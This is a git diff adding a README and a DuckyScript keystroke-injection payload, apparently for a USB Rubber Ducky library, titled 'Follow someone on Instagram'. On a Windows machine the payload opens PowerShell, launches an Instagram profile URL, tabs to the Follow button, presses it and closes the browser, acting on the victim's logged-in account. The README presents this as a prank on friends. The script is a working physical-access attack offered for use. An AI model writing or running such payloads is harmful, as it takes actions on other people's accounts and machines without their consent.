diff --git a/payloads/library/execution/Follow_Someone_On_Instagram/README.md b/payloads/library/execution/Follow_Someone_On_Instagram/README.md new file mode 100644 index 0000000..9c92213 --- /dev/null +++ b/payloads/library/execution/Follow_Someone_On_Instagram/README.md @@ -0,0 +1,50 @@ +# Follow someone on Instagram + +This script can be used to prank friends by having them follow an Instagram account or it can be used by yourself to speed up this process. + +Open a PowerShell, start a process trough the default browser that go to an instagram link like this one `https://www.instagram.com/alessandro_greco_aka_aleff/` closing the PowerShell. Then use some TABs to go to Follow button and then close the browser. + +**Category**: Execution + +## Note + +Tested on: +- Windows 11 Eng +- Firefox Browser Eng + +## Dependencies + +* Internet Connection +* Instagram account logged in + +## Settings + +- You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/ + + `[18] DEFINE #INSTAGRAM_LINK example` + +- It depends by the computer power and by the internet connection power + + `[72] DELAY 2000` + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
diff --git a/payloads/library/execution/Follow_Someone_On_Instagram/payload.txt b/payloads/library/execution/Follow_Someone_On_Instagram/payload.txt new file mode 100644 index 0000000..5e3e271 --- /dev/null +++ b/payloads/library/execution/Follow_Someone_On_Instagram/payload.txt @@ -0,0 +1,81 @@ +REM_BLOCK +################################################ +# # +# Title : Follow someone on Instagram # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +################################################ +END_REM + +REM Requirements: +REM - Internet Connection +REM - Instagram account logged in + +REM You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/ +DEFINE #INSTAGRAM_LINK example + + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + + +GUI r +DELAY 500 +STRINGLN powershell +DELAY 2000 + +STRINGLN Start-Process "#INSTAGRAM_LINK"; exit; +REM It depends by the computer power and by the internet connection power +DELAY 2000 + +REM Go to Follow button and click it +REPEAT 12 TAB +DELAY 500 +ENTER +DELAY 1000 + +REM Close the Browser +ALT F4